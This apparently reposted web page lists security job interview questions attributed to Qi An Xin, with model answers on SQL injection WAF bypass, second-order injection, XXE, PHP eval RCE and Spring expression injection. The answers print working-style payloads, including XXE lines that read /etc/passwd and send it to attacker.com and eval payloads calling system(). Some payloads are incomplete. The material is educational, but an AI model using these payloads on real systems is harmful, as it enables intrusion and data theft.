当前位置: 首页 > news >正文

奇安信面试题

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

下面是奇安信部分面试题:

问题1
如何利用基于时间的盲注绕过WAF进行数据库指纹识别?请详细说明攻击原理,并给出至少3种现代WAF的绕过技巧。

答案

  • 原理:通过构造条件语句触发数据库延时函数(如MySQL的SLEEP()),根据响应时间差异判断条件真假。

  • 绕过技巧
    1. 分块传输编码:利用HTTP协议分块传输绕过正则检测

    2. Unicode编码混淆SLEEP(5)\u0053\u004c\u0045\u0045\u0050(5)

    3. 参数污染id=1&id=sleep(5)-- 利用后端参数解析特性

    4. 注释符内联/*!50000SLEEP(5)*/(MySQL版本特性)

问题2
某系统使用预处理语句防御SQL注入,但仍存在二次注入漏洞。请分析其成因,并说明如何通过用户注册功能实现数据库篡改。

答案

  • 成因:数据存储时未过滤,后续拼接时触发注入。预处理仅防御即时查询,无法阻止存储的恶意数据被复用。

  • 攻击步骤
    1. 注册用户名:admin'-- (含单引号)

    2. 修改密码时触发SQL:UPDATE users SET password='xxx' WHERE username='admin'-- '

    3. 实际执行语句修改admin用户密码

问题3
给出以下XML解析代码,如何构造恶意XML实现/etc/passwd读取并外传数据?防御方案需修改哪些代码?

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
db.parse(new InputSource(inputStream));

答案

  • 攻击Payload

<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root>&exfil;</root>
  • 防御方案
    1. 禁用DTD:dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

    2. 禁用外部实体:dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);

问题4
如何通过DNS外带检测无回显的XXE漏洞?给出具体步骤及需要监控的日志类型。

答案

  1. 构造恶意DTD触发DNS查询:

<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % int "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%payload;'>">
  1. 监控点
    • DNS服务器日志(如dig查询记录)

    • Web服务器访问日志(含base64参数)

  2. 利用协议封装:ftp://attacker.com/%payload(部分解析器支持)

问题5
某PHP系统使用eval("echo $userInput;"),如何构造输入实现RCE?给出两种不同技术路线的Payload并说明修复方案。

答案

  • Payload 1(动态函数调用):
    ';system($_GET["cmd"]);//eval("echo '';system($_GET["cmd"]);//");

  • Payload 2(反引号执行):
    ".$_GET[cmd]." → 触发shell命令执行

  • 修复
    1. 禁用eval()或严格过滤输入(白名单)

    2. 设置disable_functions=system,exec

问题6
某Spring MVC应用使用@ResponseBody返回name=${param.user},攻击者如何利用此漏洞实现任意文件读取?给出完整利用链。

答案

  • 利用步骤
    1. 触发EL表达式:user=__${T(java.lang.Runtime).getRuntime().exec("cat /etc/passwd")}__

    2. 利用ScriptEngine执行JS代码:
      user=#{T(javax.script.ScriptEngineManager).newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('cmd')")}

  • 防御:使用@ResponseBody时禁用表达式解析(Spring Security配置)

相关文章:

  • 过程性编程(Procedural Programming)和面向对象编程
  • OpenFeign
  • 1.6【hardware]
  • 《灵珠觉醒:从零到算法金仙的C++修炼》卷三·天劫试炼(56)斩仙葫芦收字母 - 字母异位词分组(哈希映射)
  • Spring Retry
  • Python基于Django和协同过滤算法实现电影推荐系统功能丰富版
  • kubernetes|云原生|部署单master的kubernetes 1.25.5版本集群完全记录(使用contained 运行时)
  • 课堂练习 2:测试 PHP 是否安装成功
  • 用uv管理python环境/项目(各种应用场景)
  • Kafka可视化工具KafkaTool工具的使用
  • 3.4 Spring Boot整合Elasticsearch:全文检索与聚合分析
  • 游戏引擎学习第164天
  • 解析GNGGA数据,C语言单片机
  • 【k8s002】k8s健康检查与故障诊断
  • ETIMEDOUT 网络超时问题
  • 电机控制常见面试问题(十三)
  • redis事务
  • 企业微信群聊机器人开发
  • 深度优先搜索(DFS)与方格图的连通性判断
  • 案例驱动的 IT 团队管理:创新与突破之路:第一章 重构 IT 团队管理:从传统到创新-1.2.1 真实场景还原:从失败中学习
  • 网站建设+深圳+凡科/简述什么是网络营销
  • 网站建设 上海交大/搜易网提供的技术服务
  • 无锡所有网站设计制作/推广链接让别人点击
  • 建设南大街小学网站/推广排名seo
  • 沧州好的做网站的公司/企业网站优化工具
  • 免费网络空间/关键词优化一年的收费标准